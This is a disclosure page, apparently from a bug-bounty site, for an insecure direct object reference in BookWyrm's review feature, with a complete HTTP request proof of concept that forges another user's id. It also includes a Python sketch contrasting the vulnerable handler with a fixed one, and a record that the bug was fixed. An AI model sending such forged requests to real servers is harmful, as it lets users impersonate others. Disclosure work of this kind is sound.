Insecure direct object references in "review" function in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 15th 2022

Description

An insecure direct object reference in the "review a book" function allows one user to create a review on behalf of another user: the server trusts the user id submitted in the form instead of the id of the authenticated session.

Proof of Concept

POST /post/review HTTP/2
Host: book.dansmonorage.blue
Cookie: csrftoken=bYsdqkQkkbYXZYRVd8AynhYxG1rBb2AoOfAO76XCYmgzXK3A266EpZamGcKL0pN5; django_language=None; sessionid=yq7gxnp9ypxohws3mmh1h7mrgogg6xsz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://book.dansmonorage.blue/
Content-Type: multipart/form-data; boundary=---------------------------269697065920795935563955484832
Content-Length: 1207
Origin: https://book.dansmonorage.blue
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: green
Te: trailers

-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="csrfmiddlewaretoken"

EEplsmJEq47ABzhShOKjf4PAbhjHG2YohVxW98QW4fpczltx6MgphM1pbsCRvpb5
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="book"

60596
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="user"

6847 // change others id
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="reply_parent"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="name"

From id 6847
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="rating"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content"

My book1 <h1>123</h1>
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content_warning"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="privacy"

public
-----------------------------269697065920795935563955484832--

Impact

This vulnerability allows a user to post a review of a book under another user's account, affecting the logic of the application.
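The pattern behind this report, as an added illustration that is not code from the BookWyrm project (the actual fix in commit b66ce2 is not reproduced here): a framework-independent Python sketch of a review handler that trusts the client-supplied "user" form field, next to a hardened handler that takes the author from the authenticated session and refuses a mismatching submitted id. The Request/Review classes and the user id 1234 are constructed for the example; the book id 60596 and user id 6847 are the values from the proof of concept above.

```python
from dataclasses import dataclass, field


@dataclass
class Request:
    """Minimal stand-in for a web framework request (constructed for this example)."""
    user_id: int                                # user identified by the session cookie
    POST: dict = field(default_factory=dict)    # submitted multipart form fields


@dataclass
class Review:
    book_id: int
    user_id: int
    name: str
    content: str
    privacy: str


class Forbidden(Exception):
    """Raised when a request tries to act as a different user than the session owner."""


def create_review_vulnerable(request: Request) -> Review:
    """IDOR pattern: the author of the review is whatever id the client put in the form."""
    form = request.POST
    return Review(
        book_id=int(form["book"]),
        user_id=int(form["user"]),          # attacker-controlled
        name=form["name"],
        content=form["content"],
        privacy=form.get("privacy", "public"),
    )


def create_review_fixed(request: Request) -> Review:
    """Hardened handler: the author always comes from the authenticated session."""
    form = request.POST
    submitted = form.get("user")
    if submitted not in (None, "") and int(submitted) != request.user_id:
        # Reject instead of silently overriding, so the attempt shows up in
        # application logs and can be alerted on.
        raise Forbidden(
            f"session user {request.user_id} tried to post as user {submitted}"
        )
    return Review(
        book_id=int(form["book"]),
        user_id=request.user_id,            # never taken from the form
        name=form["name"],
        content=form["content"],
        privacy=form.get("privacy", "public"),
    )


# Constructed sample: the session belongs to user 1234, but the form claims user 6847.
SAMPLE_FORM = {
    "book": "60596",
    "user": "6847",
    "name": "From id 6847",
    "content": "My book1",
    "privacy": "public",
}
SAMPLE_REQUEST = Request(user_id=1234, POST=SAMPLE_FORM)


def run_demo() -> dict:
    """Return which user each handler attributes the sample review to."""
    result = {"vulnerable": create_review_vulnerable(SAMPLE_REQUEST).user_id}
    try:
        create_review_fixed(SAMPLE_REQUEST)
        result["fixed"] = "accepted"
    except Forbidden as exc:
        result["fixed"] = f"rejected: {exc}"
    return result


if __name__ == "__main__":
    print(run_demo())
```

In the vulnerable handler the review is stored as user 6847's; the hardened one raises Forbidden for the same request, and a form without a "user" field is attributed to the session user. The same check applies to any other server-side field that names an owner, such as reply_parent.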

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 10 months ago
Mouse Reeve validated this vulnerability 10 months ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve marked this as fixed in 0.4.4 with commit b66ce2 10 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Mouse Reeve gave praise 10 months ago
Thanks for catching these!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1